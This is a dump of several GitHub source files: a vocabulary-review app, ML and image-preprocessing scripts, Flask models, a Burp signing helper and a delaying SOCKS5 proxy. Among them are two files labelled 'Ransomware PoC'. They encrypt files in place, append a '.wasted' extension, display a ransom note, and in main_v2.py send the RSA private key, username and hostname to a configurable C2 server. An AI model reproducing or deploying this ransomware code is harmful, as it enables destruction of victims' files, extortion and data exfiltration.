# Build today's review list from the local time reported by the UI, adjust the word order and assign candidate meanings
class randomize():
def __init__(self):
self.today_word_list = []
#打开各种json文件
with open('messstatus.json', 'r', encoding='utf-8') as json_file:
messstatus = json.loads(json_file.read())
self.messstatus = json.loads(messstatus)
with open('status.json', 'r', encoding='utf-8') as json_file:
status = json.loads(json_file.read())
self.status = json.loads(status)
try:
with open('vocabulary.json', 'r', encoding='utf-8') as json_file:
vocabulary = json.loads(json_file.read())
self.vocabulary = json.loads(vocabulary)
except:
print("单词本中空空如也")
#调用函数获得今天
def get_today_word_list(self):
localtime = time.localtime(time.time())
localdate = str(localtime.tm_year) + "-" + str(localtime.tm_mon) + "-" + str(localtime.tm_mday)
lyear = localtime.tm_year
lmon = localtime.tm_mon
lday = localtime.tm_mday
new_word = 1
# Every word has a corresponding entry in status.json
for word in list(self.status.keys()):
try:
a,b,c = self.status[word][0].split("-")
except: # guard against a missing review date; unlikely, but an empty date can occur
a,b,c = [9999,9999,9999]
# Check whether the word is due today
if int(a) != 2000:
if lyear >= int(a) and lmon >= int(b) and lday >= int(c):
self.today_word_list.append(word)
else:
pass
# Newly imported words (from either import path) are initialized to 2000-1-1; the number of new words per day is configurable
elif int(a) == 2000 and new_word <= 5: # for testing; change to 20 later
self.today_word_list.append(word)
new_word += 1
# Shuffle the words scheduled for today
random.shuffle(self.today_word_list)
# Sort the list so that confusable words end up next to each other
def sort(self):
for word in self.today_word_list:
if word in list(self.messstatus.keys()): # does this word have confusable words?
messlist = list(self.messstatus[word].keys()) # list of confusable words
for word2 in messlist:
if word2 in self.today_word_list: # is the confusable word also scheduled for today?
self.today_word_list.remove(word2)
self.today_word_list.insert( self.today_word_list.index(word) + 1 , word2) # place it right after the word it is confused with
else:
pass
def get_meaning(self):
self.get_today_word_list()
self.sort()
today_word_dict = {}
meaninglist = []
list1 = list(self.vocabulary.keys())
for word in self.today_word_list:
meaninglist = []
# Randomly pick four meanings, excluding the meaning of the word being tested
list2 = [x for x in list1 if x!=word]
random.shuffle(list2) # randomize the candidate words and their meanings
m1, m2, m3, m4 = self.vocabulary[list2[0]][0], \
self.vocabulary[list2[1]][0], \
self.vocabulary[list2[2]][0], \
self.vocabulary[list2[3]][0]
meaninglist.insert(0,self.vocabulary[word][0]) # insert the correct meaning
# Fill in decoy meanings
if word in self.messstatus: # the word has known confusable words
messlist = list(self.messstatus[word].keys())
meaninglist.insert(1,self.vocabulary[messlist[0]][0]) # insert the first decoy meaning
meaninglist.insert(2, m3)
meaninglist.insert(3, m2)
if len(messlist) == 2:
meaninglist.insert(2,self.vocabulary[messlist[1]][0])
meaninglist.insert(3,m2)
elif len(messlist) >= 3:
meaninglist.insert(2, self.vocabulary[messlist[1]][0])
meaninglist.insert(3,self.vocabulary[messlist[2]][0])
today_word_dict[word] = tuple(meaninglist)
else:
meaninglist.insert(1,m1)
meaninglist.insert(2,m2)
meaninglist.insert(3,m3)
today_word_dict[word] = tuple(meaninglist)
return today_word_dict
```
#### File: jimmylee412/Updated-supermemo/Chinadaily.py
```python
import json
import random
def getlinks():
with open('fbdict.json', 'r', encoding='utf-8') as json_file:
fbdict2 = json.loads(json_file.read())
fbdict = json.loads(fbdict2)
wordlist = list(fbdict.keys())
print(len(wordlist))
with open('link.json', 'r', encoding='utf-8') as json_file:
link2 = json.loads(json_file.read())
link_ori = json.loads(link2)
links = {}
for word in list(link_ori.keys()): # build a dictionary mapping each article link to the words it contains
for alink in link_ori[word]:
if alink not in list(links.keys()):
links[alink] = [word]
else:
links[alink].append(word)
article = []
for link in [a for a in list(links.keys()) if len(links[a]) > 1]: # links that contain more than one word
if set(links[link]).issubset(set(wordlist)): # if every word in this link is in today's wordlist
article.append(link)
print("a")
for word in links[link]:
wordlist.remove(word)
for link in [a for a in list(links.keys()) if len(links[a]) > 1]:
if len(set(links[link]) & set(wordlist)) >1:
article.append(link)
for word in list(set(links[link]) & set(wordlist)):
wordlist.remove(word)
for word in wordlist: # the remaining unmatched words can only be covered by single articles
try:
random.shuffle(link_ori[word])
article.append(link_ori[word][0])
except:
print("这个单词没有更新文章列表",word)
articledic = {}
for word in wordlist:
if word in list(link_ori.keys()) and len(list(set(link_ori[word]) & set(article)))>0:
articledic[word] = list(set(link_ori[word]) & set(article))[0] # intersection of today's links and the word's links; it contains at most one element
else:
articledic[word] = ""
return article, articledic
``` |
{
"source": "jimmyLeeMc/NeuralNetworkTesting",
"score": 3
} |
#### File: jimmyLeeMc/NeuralNetworkTesting/IMDB.py
```python
import tensorflow as tf
import numpy as np
from tensorflow import keras
from keras import layers
from keras.datasets import imdb
(train_data,train_labels),(test_data,test_labels) = imdb.load_data(num_words=10000)
activations = [layers.core.Activation(keras.activations.sigmoid),
layers.core.Activation(keras.activations.relu), layers.LeakyReLU(),
layers.core.Activation(keras.activations.tanh)]
res=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
a=0
def vectorize_sequences(sequences,dimension=10000):
results = np.zeros((len(sequences),dimension))
for i,sequence in enumerate(sequences):
results[i,sequence] = 1
return results
m=0
for a in range(4):
for b in range(4):
losssum=0
for c in range(6):
print(f'{a} , {b} , {c}')
x_train = vectorize_sequences(train_data)
x_test = vectorize_sequences(test_data)
y_train = np.asarray(train_labels).astype('float32')
y_test = np.asarray(test_labels).astype('float32')
x_val=x_train[:10000]
partial_x_train=x_train[10000:]
y_val=y_train[:10000]
partial_y_train=y_train[10000:]
from keras import models
from keras import layers
model=models.Sequential()
model.add(layers.Dense(16, input_shape=(10000,)))
model.add(activations[a]) # hidden-layer activation selected by the outer loop
model.add(layers.Dense(1))
model.add(activations[b]) # output-layer activation selected by the inner loop
model.compile(optimizer='adam',
loss='binary_crossentropy',
metrics=['acc'])
history=model.fit(partial_x_train, partial_y_train, epochs=5,batch_size=512, validation_data=(x_val,y_val))
losssum=losssum+history.history['val_loss'][len(history.history['val_loss'])-1]
print(res)
``` |
{
"source": "jimmylin1017cs/enet-pytorch",
"score": 3
} |
#### File: jimmylin1017cs/enet-pytorch/image_preprocess.py
```python
import numpy as np
import cv2
import os
import argparse
from tqdm import tqdm
# define cityscape id to train id
id_to_train_id_map = {
0:19,
1:19,
2:19,
3:19,
4:19,
5:19,
6:19,
7:0,
8:1,
9:19,
10:19,
11:2,
12:3,
13:4,
14:19,
15:19,
16:19,
17:5,
18:19,
19:6,
20:7,
21:8,
22:9,
23:10,
24:11,
25:12,
26:13,
27:14,
28:15,
29:19,
30:19,
31:16,
32:17,
33:18,
-1:-1,
}
# create the function to map train id
id_to_train_id_map_func = np.vectorize(id_to_train_id_map.get)
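# For example, id_to_train_id_map_func(np.array([7, 26, 0])) returns array([0, 13, 19]):
# road -> train id 0, car -> train id 13, and unlabeled pixels collapse into the ignore class 19.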
def create_output_image_path(output_image_path):
if not os.path.exists(output_image_path):
os.makedirs(output_image_path)
if not os.path.exists(output_image_path + 'train'):
os.makedirs(output_image_path + 'train')
if not os.path.exists(output_image_path + 'trainannot'):
os.makedirs(output_image_path + 'trainannot')
if not os.path.exists(output_image_path + 'val'):
os.makedirs(output_image_path + 'val')
if not os.path.exists(output_image_path + 'valannot'):
os.makedirs(output_image_path + 'valannot')
if not os.path.exists(output_image_path + 'test'):
os.makedirs(output_image_path + 'test')
if not os.path.exists(output_image_path + 'testannot'):
os.makedirs(output_image_path + 'testannot')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-iptr', '--input-path-train',
type=str,
default='./cityscapes/train/',
help='The path to the train input dataset')
parser.add_argument('-lptr', '--label-path-train',
type=str,
default='./cityscapes/trainannot/',
help='The path to the train label dataset')
parser.add_argument('-ipv', '--input-path-val',
type=str,
default='./cityscapes/val/',
help='The path to the val input dataset')
parser.add_argument('-lpv', '--label-path-val',
type=str,
default='./cityscapes/valannot/',
help='The path to the val label dataset')
parser.add_argument('-iptt', '--input-path-test',
type=str,
default='./cityscapes/test/',
help='The path to the test input dataset')
parser.add_argument('-lptt', '--label-path-test',
type=str,
default='./cityscapes/testannot/',
help='The path to the test label dataset')
parser.add_argument('-oimh', '--output-image-height',
type=int,
default=256,
help='The output image height')
parser.add_argument('-oimw', '--output-image-width',
type=int,
default=512,
help='The output image width')
parser.add_argument('-op', '--output-image-path',
type=str,
default='./cityscapes_preprocess/',
help='The path to the output dataset')
args = parser.parse_args()
input_path_train = args.input_path_train
label_path_train = args.label_path_train
input_path_val = args.input_path_val
label_path_val = args.label_path_val
input_path_test = args.input_path_test
label_path_test = args.label_path_test
output_image_height = args.output_image_height # (the height all images fed to the model will be resized to)
output_image_width = args.output_image_width # (the width all images fed to the model will be resized to)
output_image_path = args.output_image_path
number_of_classes = 20 # (number of object classes (road, sidewalk, car etc.))
# create all output image directories
create_output_image_path(output_image_path)
'''
print(input_path_train)
print(label_path_train)
print(input_path_val)
print(label_path_val)
print(input_path_test)
print(label_path_test)
print(output_image_height)
print(output_image_width)
print(output_image_path)
'''
if os.path.exists(input_path_train) and os.path.exists(label_path_train):
input_train_names = os.listdir(input_path_train)
input_train_names.sort()
label_train_names = os.listdir(label_path_train)
label_train_names.sort()
for i in tqdm(range(len(input_train_names))):
input_train_image_path = input_path_train + input_train_names[i]
input_train_image = cv2.imread(input_train_image_path)
input_train_image = cv2.resize(input_train_image, (output_image_width, output_image_height), interpolation=cv2.INTER_NEAREST)
label_train_image_path = label_path_train + label_train_names[i]
label_train_image = cv2.imread(label_train_image_path, cv2.IMREAD_GRAYSCALE)
label_train_image = cv2.resize(label_train_image, (output_image_width, output_image_height), interpolation=cv2.INTER_NEAREST)
label_train_image = id_to_train_id_map_func(label_train_image)
cv2.imwrite(output_image_path + 'train/' + input_train_names[i], input_train_image)
cv2.imwrite(output_image_path + 'trainannot/' + label_train_names[i], label_train_image)
else:
print("The path to the train dataset not exist")
if os.path.exists(input_path_val) and os.path.exists(label_path_val):
input_val_names = os.listdir(input_path_val)
input_val_names.sort()
label_val_names = os.listdir(label_path_val)
label_val_names.sort()
for i in tqdm(range(len(input_val_names))):
input_val_image_path = input_path_val + input_val_names[i]
input_val_image = cv2.imread(input_val_image_path)
input_val_image = cv2.resize(input_val_image, (output_image_width, output_image_height), interpolation=cv2.INTER_NEAREST)
label_val_image_path = label_path_val + label_val_names[i]
label_val_image = cv2.imread(label_val_image_path, cv2.IMREAD_GRAYSCALE)
label_val_image = cv2.resize(label_val_image, (output_image_width, output_image_height), interpolation=cv2.INTER_NEAREST)
label_val_image = id_to_train_id_map_func(label_val_image)
cv2.imwrite(output_image_path + 'val/' + input_val_names[i], input_val_image)
cv2.imwrite(output_image_path + 'valannot/' + label_val_names[i], label_val_image)
else:
print("The path to the val dataset not exist")
if os.path.exists(input_path_test) and os.path.exists(label_path_test):
pass
else:
print("The path to the test dataset not exist")
``` |
{
"source": "ji-mmyliu/lyonhacks-web-dev-workshop",
"score": 3
} |
#### File: lyonhacks-web-dev-workshop/flask_site/models.py
```python
from flask_site import db, login_manager
from datetime import datetime
from flask_login import UserMixin
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class User(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key = True)
username = db.Column(db.String(20), unique = True, nullable = False)
password = db.Column(db.String(20), nullable = False)
tasks = db.relationship("Task", backref = "owner", lazy = True)
def __repr__(self):
return f"(id: {self.id}, username: {self.username}, password: {self.password})"
class Task(db.Model):
id = db.Column(db.Integer, primary_key = True)
content = db.Column(db.Text, nullable = False)
date_created = db.Column(db.DateTime, nullable = False, default = datetime.now())
owner_id = db.Column(db.Integer, db.ForeignKey("user.id"))
def __repr__(self):
return f"({self.id}, {self.content}, {self.date_created}, {self.owner})"
``` |
{
"source": "jimmy-ly00/burp-extensions",
"score": 3
} |
#### File: burp-extensions/burp-external-crypto-header/sign.py
```python
import sys
import base64
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256
from Crypto.PublicKey import RSA
def encrypt_text(StringToSign):
key = RSA.importKey(open('./private-key.pem').read())
h = SHA256.new(StringToSign.encode("utf-8"))
signature = pkcs1_15.new(key).sign(h)
return base64.b64encode(signature).decode("utf-8")
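# Usage sketch (assumes an RSA private key in PEM format exists at ./private-key.pem):
#   python sign.py "string-to-sign"
# prints the base64-encoded PKCS#1 v1.5 signature of SHA-256("string-to-sign").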
def main():
result = encrypt_text(sys.argv[1])
print(result)
if __name__ == "__main__":
main()
``` |
{
"source": "jimmy-ly00/mlsocks",
"score": 3
} |
#### File: jimmy-ly00/mlsocks/mlsocks.py
```python
import socket
import sys
import select
import SocketServer
import struct
import fcntl
import termios
import array
import time
import random
from math import log, exp, ceil
from gevent import sleep, spawn, select
from gevent.pool import Group
BUF_SIZE = 512
class ThreadingTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): pass
class Socks5Server(SocketServer.StreamRequestHandler):
def delay_message(self, message, delay, current_target):
sleep(delay)
#print("New delay: {}".format(delay))
current_target.send(message)
def calculate_delay(self, prev):
# Generate random number from truncated exponential distribution
u = random.SystemRandom().random()
lam = 1 # mean
tau = 15 # maximum bound
delay = -log(1 - (1 - exp(-lam * tau)) * u) / lam
timestamp = time.time() * 1000
new = timestamp + delay * 1000
# Stops messages overtaking each other by checking against the latest delay
if prev[0] < new:
prev[0] = new
prev[1] = delay
else:
delay = prev[1]
return delay
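# The formula above is inverse-CDF sampling of an exponential(lam) distribution truncated at tau:
# for u ~ Uniform(0, 1), delay = -ln(1 - (1 - e^(-lam*tau)) * u) / lam always falls in [0, tau].
# With lam = 1 and tau = 15, u = 0.5 yields roughly 0.69 seconds of added delay.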
def handle_tcp(self, sock, remote):
fdset = [sock, remote]
tasks = Group()
prev = [0, 0]
sock_switch = remote_switch = 0
sock_counter = remote_counter = 0
sock_count = remote_count = 0
sock_size = array.array('i', [0])
remote_size = array.array('i', [0])
while True:
r, w, e = select.select(fdset, [], [])
# The problem is knowing beforehand when the socket is going to switch, in order to join all remaining tasks
# FIONREAD will check size of available bytes of the socket to catch the last send()/recv()
if sock in r:
if sock_switch == 0:
fcntl.ioctl(sock, termios.FIONREAD, sock_size, True)
sock_count = ceil(sock_size[0] / float(BUF_SIZE))
print("sock", sock_size[0], sock_count)
sock_switch = 1
delay = self.calculate_delay(prev)
sock_buf = sock.recv(BUF_SIZE)
#print(sock_buf)
if sock_buf is None or sock_buf == "": break
tasks.spawn(self.delay_message, sock_buf, delay, remote)
sock_counter += 1
if remote in r:
if remote_switch == 0:
fcntl.ioctl(remote, termios.FIONREAD, remote_size, True)
remote_count = ceil(remote_size[0] / float(BUF_SIZE))
print("remote", remote_size[0], remote_count)
remote_switch = 1
delay = self.calculate_delay(prev)
remote_buf = remote.recv(BUF_SIZE)
#print(remote_buf)
if remote_buf is None or remote_buf == "": break
tasks.spawn(self.delay_message, remote_buf, delay, sock)
remote_counter += 1
# Wait for last task before switching socket
if sock_count == sock_counter and sock_switch == 1:
print("joiningsocks")
tasks.join()
sock_counter = sock_switch = 0
if remote_count == remote_counter and remote_switch == 1:
print("joiningremote")
tasks.join()
remote_counter = remote_switch = 0
def handle(self):
try:
print 'socks connection from ', self.client_address
sock = self.connection
# 1. Version
sock.recv(262)
sock.send(b"\x05\x00")
# 2. Request
data = self.rfile.read(4)
mode = ord(data[1])
addrtype = ord(data[3])
if addrtype == 1: # IPv4
addr = socket.inet_ntoa(self.rfile.read(4))
elif addrtype == 3: # Domain name
addr = self.rfile.read(ord(sock.recv(1)[0]))
port = struct.unpack('>H', self.rfile.read(2))
reply = b"\x05\x00\x00\x01"
try:
if mode == 1: # 1. Tcp connect
remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote.connect((addr, port[0]))
print 'Tcp connect to', addr, port[0]
else:
reply = b"\x05\x07\x00\x01" # Command not supported
local = remote.getsockname()
reply += socket.inet_aton(local[0]) + struct.pack(">H", local[1])
except socket.error:
# Connection refused
reply = '\x05\x05\x00\x01\x00\x00\x00\x00\x00\x00'
sock.send(reply)
# 3. Transfering
if reply[1] == '\x00': # Success
if mode == 1: # 1. Tcp connect
self.handle_tcp(sock, remote)
except socket.error, exc:
print "Caught exception socket.error : %s" % exc
def main():
ThreadingTCPServer.allow_reuse_address = True
server = ThreadingTCPServer(('127.0.0.1', 1080), Socks5Server)
server.serve_forever()
if __name__ == '__main__':
main()
``` |
{
"source": "jimmy-ly00/Ransomeware-PoC",
"score": 3
} |
#### File: jimmy-ly00/Ransomeware-PoC/main.py
```python
from Crypto.PublicKey import RSA
from Crypto import Random
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.Util import Counter
import argparse
import os
import sys
import base64
import platform
import discover
import modify
# -----------------
# GLOBAL VARIABLES
# CHANGE IF NEEDED
# -----------------
# set to either: '128/192/256 bit plaintext key' or False
HARDCODED_KEY = b'+<KEY>' # AES 256-key used to encrypt files
SERVER_PUBLIC_RSA_KEY = '''-----BEGIN PUBLIC KEY-----
<KEY>
-----END PUBLIC KEY-----''' # Attacker's embedded public RSA key used to encrypt AES key
SERVER_PRIVATE_RSA_KEY = '''-----BEGIN RSA PRIVATE KEY-----
<KEY>''' # SHOULD NOT BE INCLUDED - only for decryptor purposes
extension = ".wasted" # Ransomware custom extension
def parse_args():
parser = argparse.ArgumentParser(description='Ransomware PoC')
parser.add_argument('-p', '--path', help='Absolute path to start encryption. If none specified, defaults to %%HOME%%/test_ransomware', action="store")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-e', '--encrypt', help='Enable encryption of files',
action='store_true')
group.add_argument('-d', '--decrypt', help='Enable decryption of encrypted files',
action='store_true')
return parser.parse_args()
def main():
if len(sys.argv) <= 1:
print('[*] Ransomware - PoC\n')
# banner()
print('Usage: python3 main.py -h')
print('{} -h for help.'.format(sys.argv[0]))
exit(0)
# Parse arguments
args = parse_args()
encrypt = args.encrypt
decrypt = args.decrypt
absolute_path = str(args.path)
# Force one click and comment out args above
# absolute_path = "None"
# encrypt = True
# decrypt = False
if absolute_path != 'None':
startdirs = [absolute_path]
else:
# Check OS
plt = platform.system()
if plt == "Linux" or plt == "Darwin":
startdirs = [os.environ['HOME'] + '/test_ransomware']
elif plt == "Windows":
startdirs = [os.environ['USERPROFILE'] + '\\test_ransomware']
# Can also hardcode additional directories
# startdirs = [os.environ['USERPROFILE'] + '\\Desktop',
# os.environ['USERPROFILE'] + '\\Documents',
# os.environ['USERPROFILE'] + '\\Music',
# os.environ['USERPROFILE'] + '\\Desktop',
# os.environ['USERPROFILE'] + '\\Onedrive']
else:
print("Unidentified system")
exit(0)
# Encrypt AES key with attacker's embedded RSA public key
server_key = RSA.importKey(SERVER_PUBLIC_RSA_KEY)
encryptor = PKCS1_OAEP.new(server_key)
encrypted_key = encryptor.encrypt(HARDCODED_KEY)
encrypted_key_b64 = base64.b64encode(encrypted_key).decode("ascii")
print("Encrypted key " + encrypted_key_b64 + "\n")
if encrypt:
print("[COMPANY_NAME]\n\n"
"YOUR NETWORK IS ENCRYPTED NOW\n\n"
"USE - TO GET THE PRICE FOR YOUR DATA\n\n"
"DO NOT GIVE THIS EMAIL TO 3RD PARTIES\n\n"
"DO NOT RENAME OR MOVE THE FILE\n\n"
"THE FILE IS ENCRYPTED WITH THE FOLLOWING KEY\n"
"[begin_key]\n{}\n[end_key]\n"
"KEEP IT\n".format(SERVER_PUBLIC_RSA_KEY))
key = HARDCODED_KEY
if decrypt:
# # RSA Decryption function - warning that private key is hardcoded for testing purposes
rsa_key = RSA.importKey(SERVER_PRIVATE_RSA_KEY)
decryptor = PKCS1_OAEP.new(rsa_key)
key = decryptor.decrypt(base64.b64decode(encrypted_key_b64))
# Create AES counter and AES cipher
ctr = Counter.new(128)
crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
# Recursively go through folders and encrypt/decrypt files
for currentDir in startdirs:
for file in discover.discoverFiles(currentDir):
if encrypt and not file.endswith(extension):
modify.modify_file_inplace(file, crypt.encrypt)
os.rename(file, file + extension)
print("File changed from " + file + " to " + file + extension)
if decrypt and file.endswith(extension):
modify.modify_file_inplace(file, crypt.encrypt)
file_original = os.path.splitext(file)[0]
os.rename(file, file_original)
print("File changed from " + file + " to " + file_original)
# This wipes the key out of memory
# to avoid recovery by third party tools
for _ in range(100):
#key = random(32)
pass
if __name__=="__main__":
main()
```
#### File: jimmy-ly00/Ransomeware-PoC/main_v2.py
```python
from Crypto.PublicKey import RSA
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.Util import Counter
import argparse
import os
import sys
import base64
import platform
import getpass
import socket
import base64
import discover
import modify
from gui import mainwindow
# -----------------
# GLOBAL VARIABLES
# CHANGE IF NEEDED
# -----------------
HARDCODED_KEY = b'+<KEY>' # AES 256-key used to encrypt files
SERVER_PUBLIC_RSA_KEY = '''-----BEGIN PUBLIC KEY-----
<KEY>
-----END PUBLIC KEY-----''' # Attacker's embedded public RSA key used to encrypt AES key
SERVER_PRIVATE_RSA_KEY = '''-----BEGIN RSA PRIVATE KEY-----
<KEY>
-----END RSA PRIVATE KEY-----''' # SHOULD NOT BE INCLUDED - only for decryptor purposes
extension = ".wasted" # Ransomware custom extension
# Exfiltrate key to C2
host = '127.0.0.1' # e.g. maliciousc2.com
port = 443 # e.g. 443
def getlocalip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))
return s.getsockname()[0]
def parse_args():
parser = argparse.ArgumentParser(description='Ransomware PoC')
parser.add_argument('-p', '--path', help='Absolute path to start encryption. If none specified, defaults to %%HOME%%/test_ransomware', action="store")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-e', '--encrypt', help='Enable encryption of files',
action='store_true')
group.add_argument('-d', '--decrypt', help='Enable decryption of encrypted files',
action='store_true')
return parser.parse_args()
def main():
if len(sys.argv) <= 1:
print('[*] Ransomware - PoC\n')
# banner()
print('Usage: python3 main_v2.py -h')
print('{} -h for help.'.format(sys.argv[0]))
exit(0)
# Parse arguments
args = parse_args()
encrypt = args.encrypt
decrypt = args.decrypt
absolute_path = str(args.path)
# Force one click and comment out args above
# absolute_path = "None"
# encrypt = True
# decrypt = False
if absolute_path != 'None':
startdirs = [absolute_path]
else:
# Check OS
plt = platform.system()
if plt == "Linux" or plt == "Darwin":
startdirs = [os.environ['HOME'] + '/test_ransomware']
elif plt == "Windows":
startdirs = [os.environ['USERPROFILE'] + '\\test_ransomware']
# Can also hardcode additional directories
# startdirs = [os.environ['USERPROFILE'] + '\\Desktop',
# os.environ['USERPROFILE'] + '\\Documents',
# os.environ['USERPROFILE'] + '\\Music',
# os.environ['USERPROFILE'] + '\\Desktop',
# os.environ['USERPROFILE'] + '\\Onedrive']
else:
print("Unidentified system")
exit(0)
# Encrypt AES key with attacker's embedded RSA public key
server_key = RSA.importKey(SERVER_PUBLIC_RSA_KEY)
encryptor = PKCS1_OAEP.new(server_key)
encrypted_key = encryptor.encrypt(HARDCODED_KEY)
encrypted_key_b64 = base64.b64encode(encrypted_key).decode("ascii")
print("Encrypted key " + encrypted_key_b64 + "\n")
if encrypt:
key = HARDCODED_KEY
if decrypt:
# RSA Decryption function - warning that private key is hardcoded for testing purposes
rsa_key = RSA.importKey(SERVER_PRIVATE_RSA_KEY)
decryptor = PKCS1_OAEP.new(rsa_key)
key = decryptor.decrypt(base64.b64decode(encrypted_key_b64))
# Create AES counter and AES cipher
ctr = Counter.new(128)
crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
# Recursively go through folders and encrypt/decrypt files
for currentDir in startdirs:
for file in discover.discoverFiles(currentDir):
if encrypt and not file.endswith(extension):
modify.modify_file_inplace(file, crypt.encrypt)
os.rename(file, file + extension)
print("File changed from " + file + " to " + file + extension)
if decrypt and file.endswith(extension):
modify.modify_file_inplace(file, crypt.encrypt)
file_original = os.path.splitext(file)[0]
os.rename(file, file_original)
print("File changed from " + file + " to " + file_original)
if encrypt:
# Exfiltrate encrypted key to C2
def connector():
server = socket.socket(socket.AF_INET)
server.settimeout(10)
try:
# Send Key
server.connect((host, port))
msg = '%s$%s$%s$%s$%s$%s' % (
getlocalip(), platform.system(), SERVER_PRIVATE_RSA_KEY, SERVER_PUBLIC_RSA_KEY, getpass.getuser(), platform.node())
server.send(msg.encode('utf-8'))
# if plt == "Windows"
main = mainwindow(encrypted_key_b64)
main.mainloop()
except Exception as e:
# if plt == "Windows"
# Do not send key, encrypt anyway.
main = mainwindow(encrypted_key_b64)
main.mainloop()
pass
try:
connector()
except KeyboardInterrupt:
sys.exit(0)
# This wipes the key out of memory
# to avoid recovery by third party tools
for _ in range(100):
#key = random(32)
pass
if __name__=="__main__":
main()
``` |
{
"source": "jimmymadon/sbb-surprise",
"score": 3
} |
#### File: sbb-surprise/service/db_requests.py
```python
import pandas as pd
from random import randint
def get_id_by_location(location):
"""
:param location: name of the location
:return: result_id
-1 == location is not found
"""
result_id = -1
df = pd.read_csv("../train_stations_data.csv", sep=',')
for index, stop_name in enumerate(list(df.stop_name)):
if location == stop_name:
result_id = df.iloc[index].stop_id
return result_id
def get_location_by_id(id_):
"""
:param id_:
:return: result_location
"" == id is not found
"""
result_location = ""
df = pd.read_csv("../train_stations_data.csv", sep=',')
for index, stop_id in enumerate(list(df.stop_id)):
if id_ == stop_id:
result_location = df.iloc[index].stop_name
return result_location
def get_coordinates_by_id(id_):
df = pd.read_csv("../train_stations_data.csv", sep=',')
for index, stop_id in enumerate(list(df.stop_id)):
if id_ == stop_id:
return df.iloc[index].stop_lat, df.iloc[index].stop_lon
def get_picture_by_id(id_):
df = pd.read_csv("../station_pictures_data.csv", sep=',')
for index, stop_id in enumerate(list(df.stop_id)):
if id_ == stop_id:
return df.iloc[index].images
class Event:
def __init__(self, stop_id, stop_name, event_name, description, categories, url):
self.stop_id = stop_id
self.stop_name = stop_name
self.event_name = event_name
self.description = description
self.categories = categories
self.url = url
def get_event_list_by_id(id_):
df = pd.read_csv("../events_description_df.csv", sep=',')
event_list = []
stop_name = list(df.stop_name)
event_name = list(df.event_name)
description = list(df.description)
categories = list(df.categories)
url = list(df.url)
for index, stop_id in enumerate(list(df.stop_id)):
if id_ == stop_id:
event_list.append(Event(stop_id, stop_name[index],
event_name[index], description[index],
categories[index], url[index]))
return event_list
def select_random_cities(quantity=5, file_name="../train_stations_data.csv"):
"""
:param quantity: number of cities
:return: random ids of cities
"""
result_id_list = []
df = pd.read_csv(file_name, sep=',')
for i in range(quantity):
rand_number = randint(0, df.shape[0] - 1)
result_id_list.append(df.iloc[rand_number].stop_id)
return result_id_list
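# Illustrative usage sketch (not part of the original module); it assumes the CSV
# files referenced by the functions above exist relative to this file.
if __name__ == '__main__':
    for city_id in select_random_cities(quantity=3):
        print(city_id, get_location_by_id(city_id))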
``` |
{
"source": "jimmymalhan/code_master_platform",
"score": 3
} |
#### File: 2.leet_code/contest/Reduction Operations to Make the Array Elements Equal.py
```python
from typing import List
class Solution:
def reductionOperations(self, nums: List[int]) -> int:
nums.sort()
n = len(nums)
count = 0
for i in range(n - 1):
if nums[i] != nums[i + 1]:
count += n-1-i
return count
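# Illustrative usage sketch; the input list is assumed for demonstration only.
print(Solution().reductionOperations([5, 1, 3]))  # expected 3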
```
#### File: 3.algorithmic_expert/Graphs/1.depth_first_search.py
```python
class Node:
def __init__(self, name):
self.children = [] # list of children
self.name = name # name of node
def addChild(self, name):
self.children.append(Node(name)) # add child to list of children
return self # return self to allow chaining
# v - vertices | # e - edges
# O(v + e) time | O(v) space # v frames on call stack
def depthFirstSearch(self, array):
array.append(self.name) # adding root Node
for child in self.children: # looping for every object in children
child.depthFirstSearch(array) # calling recursively
return array
"""
Explanation:
def depthFirstSearch(self, array):
array.append(self.name) # Step - 1 start at rootNode and ADD - 'A' | Step - 4 append 'B'
for child in self.children: # Step - 2 go to 'B' | Step - 5 go to 'E'
child.depthFirstSearch(array)# Step - 3 call the stack in DFS for 'B' | step - 6 so on and so forth
return array
"""
# unit testing
if __name__ == '__main__':
root = Node('A')
root.addChild('B').addChild('C')
root.children[0].addChild('D')
root.children[0].children[0].addChild('E')
print(root.depthFirstSearch([]))
# ['A', 'B', 'D', 'E', 'C']
```
#### File: 3.algorithmic_expert/Strings/string_mainupulation.py
```python
# print(array[i]+array[i+1], end=' ') #3, 5, 7
#Ques 1-
# array = ([1,2],[3,4])
# # output = 1, 3, 2, 4
# newList = []
# for v in zip(*array):
# # (1, 3)
# # (2, 4)
# for n in v:
# # print(n)
# # 1
# # 3
# # 2
# # 4
# newList.append(n)
# print(newList)
# # print(', '.join([str(n) for v in zip(*array) for n in v]))
# x = ["apple", "banana", "cherry"]
# for idx,value in enumerate(x):
# print(idx, value)
# 0 apple
# 1 banana
# 2 cherry
# x = ["apple", "banana", "cherry"]
# for idx,value in enumerate(x, start=1):
# print(idx, value)
# 1 apple
# 2 banana
# 3 cherry
#anagram
# a = "abc"
# b = "acb"
# def Solution(a, b):
# if sorted(a) == sorted(b):
# return True
# else:
# return False
# print(Solution(a,b))
# or
# doc = "acccb"
# chara = "abccc"
# def Solution(doc, chara):
# for element in chara:
# if doc.count(element) > chara.count(element):
# return False
# return True
# print(Solution(doc,chara))
# string = "abcdcaf" - 7 elements
# for i in range(len(string)): # idx[0-6]
# # for j in range(len(string)): # idx[0-6] - 7 times
# for j in range(i, len(string)): # idx[0-6], [1-6], [2-6], [3-6], [4-6], [5,6],[6]
#######################
# count from list
#######################
# https://stackoverflow.com/questions/20510768/count-frequency-of-words-in-a-list-and-sort-by-frequency
# from collections import Counter
# words =["hello_world", "word", "b"]
# def Solution(words = None):
# # return dict((i, words.count(i)) for i in words) #{'hello world': 1, 'b': 2}
# # for i in words:
# # print(dict(i, words.count(i)))
# # # return Counter(words) # Counter({'b': 2, 'hello world': 1})
# dic = {}
# for i in words:
# dic[i] = dic.get(i, 0) + 1
